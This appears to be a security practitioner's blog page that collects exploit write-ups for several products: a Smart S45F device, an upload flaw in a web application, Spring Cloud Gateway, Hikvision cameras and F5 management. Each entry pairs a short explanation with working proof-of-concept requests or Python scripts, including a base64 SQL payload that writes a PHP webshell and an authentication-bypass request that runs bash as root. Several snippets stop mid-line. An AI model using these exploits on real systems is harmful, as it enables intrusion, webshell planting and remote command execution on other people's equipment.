Principle: The SQL statement execution interface can be reached without authorization, so arbitrary SQL statements can be executed.
Affected versions: Smart S45F
Impact: A remote attacker can use this flaw to execute arbitrary SQL statements, including writing a webshell.
POC & EXP
Manual
Vulnerable location: https://ip:port/importexport.php
This interface executes SQL statements passed in GET parameters: parameter sql = the base64-encoded SQL statement; parameter type=exportexcelbysql selects the action to execute.
POC:
https://ip:port/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql
base64 (decoded): select 0x3c3f706870206563686f2073797374656d28245f504f53545b2263
Principle: The file upload endpoint applies a whitelist; content outside the whitelist has a suffix appended and its file content base64-encoded. The encoded file is assigned an id. Supplying that id to the run method of the qcloudCosAction class in webmain/task/runt/qcloudCosAction.php restores the original suffix and content, so the uploaded file ends up being parsed by the server.
Impact: An attacker can obtain full access to the system.
POC & EXP
import requests
session = requests.session()
url_pre = 'http://x.x.x.x/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=
Principle: When the Gateway Actuator endpoint is enabled and exposed, a malicious SpEL expression can be embedded in a route definition; when the routes are refreshed the expression is evaluated, leading to RCE.
Reference: https://blog.csdn.net/m0_61506558/article/details/126914956
Affected versions:
Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.1.7
Spring Cloud Gateway 2.x
Impact: A remote attacker can use this flaw to send malicious requests that allow arbitrary remote command execution on the host.
POC & EXP
Manual
# 1. Request http://x.x.x.x:x/actuator and confirm the endpoint is open
# 2. Create a new route that injects a malicious SpEL expression; the response status should be 201 Created
POST /actuator/gateway/routes/test HTTP/1.1
Host: x.x.x.x:x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe
Principle: The camera performs no further validation of an incoming string, so a malicious command can be injected into a legitimate command.
Reference: https://kms.app/archives/399/
Affected versions:
DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 Build 160530
DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401
DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125
DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414
DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421
DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928
DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build
Principle: When HTTP basic authentication and the X-F5-Auth-Token header are both set, with the token value left empty, the program's identity check is bypassed and remote command execution is possible through a specific interface.
Affected versions:
Impact: root privileges can be obtained and commands executed as root.
POC & EXP
Manual
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.59.7
Content-Type: application/json
X-F5-Auth-Token:
Authorization: Basic YWRtaW46
Content-Length: 52

{ "command": "run", "utilCmdArgs": "-c id" }
Script
import requests
import json
import sys
requests.packages.urllib3.disable_warnings()
proxies = {'http': 'http://localhost:7890', 'https': 'http://l
Equinox
A cybersecurity practitioner who enjoys sharing